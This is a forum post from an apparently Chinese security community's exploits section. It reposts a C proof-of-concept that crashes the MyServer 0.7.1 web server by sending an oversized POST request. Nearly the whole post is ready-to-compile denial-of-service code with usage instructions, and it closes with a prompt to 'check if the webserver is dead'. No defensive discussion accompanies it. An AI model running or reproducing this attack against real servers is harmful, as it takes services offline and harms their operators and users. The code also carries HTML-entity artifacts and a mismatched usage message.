MyServer 0.7.1 POST Denial Of Service

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6819
精华: 834
积分: 36070
阅读权限: 255
性别: 男
来自: 中国
在线时间: 585 小时
注册时间: 2004-6-25
最后登录: 2008-8-28

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-9-28 16:30 只看该作者

MyServer 0.7.1 POST Denial Of Service

信息来源：hk20.com

复制内容到剪贴板

代码:

/****************************/ 

PoC to crash the server 

/****************************/ 



/* MyServer 0.7.1 POST Denial Of Service 

vendor URL: 

[url]http://www.myserverproject.net[/url] 



coded and discovered by: 

badpack3t 

for .:sp research labs:. 

[url]www.security-protocols.com[/url] 

9.20.2004 

Tested on Mandrake 10.0 



usage: 

sp-myserv-0.7.1 [targetport] (default is 80) 

*/ 



#include <&#39;winsock2.h> 

#include <&#39;stdio.h> 



#pragma comment(lib, "ws2_32.lib") 



char exploit[] = 



"POST index.html?View=Logon HTTP/1.1 " 

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 

": ihack.ms "; 



int main(int argc, char *argv[]) 

{ 

WSADATA wsaData; 

WORD wVersionRequested; 

struct hostent *pTarget; 

struct sockaddr_in sock; 

char *target; 

int port,bufsize; 

SOCKET mysocket; 



if (argc < 2) 

{ 

printf("MyServer 0.7.1 POST DoS by badpack3t ", argv[0]); 

printf("Usage: %s [targetport] (default is 80) ", argv[0]); 

printf("[url]www.security-protocols.com[/url] ", argv[0]); 

exit(1); 

} 



wVersionRequested = MAKEWORD(1, 1); 

if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; 



target = argv[1]; 

port = 80; 



if (argc >= 3) port = atoi(argv[2]); 

bufsize = 1024; 

if (argc >= 4) bufsize = atoi(argv[3]); 



mysocket = socket(AF_INET, SOCK_STREAM, 0); 

if(mysocket==INVALID_SOCKET) 

{ 

printf("Socket error! "); 

exit(1); 

} 



printf("Resolving Hostnames... "); 

if ((pTarget = gethostbyname(target)) == NULL) 

{ 

printf("Resolve of %s failed ", argv[1]); 

exit(1); 

} 



memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); 

sock.sin_family = AF_INET; 

sock.sin_port = htons((USHORT)port); 



printf("Connecting... "); 

if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))) 

{ 

printf("Couldn&#39;t connect to host. "); 

exit(1); 

} 



printf("Connected!... "); 

printf("Sending Payload... "); 

if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1) 

{ 

printf("Error Sending the Exploit Payload "); 

closesocket(mysocket); 

exit(1); 

} 



printf("Payload has been sent! Check if the webserver is dead! "); 

closesocket(mysocket); 

WSACleanup(); 

return 0; 

}

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » MyServer 0.7.1 POST Denial Of Service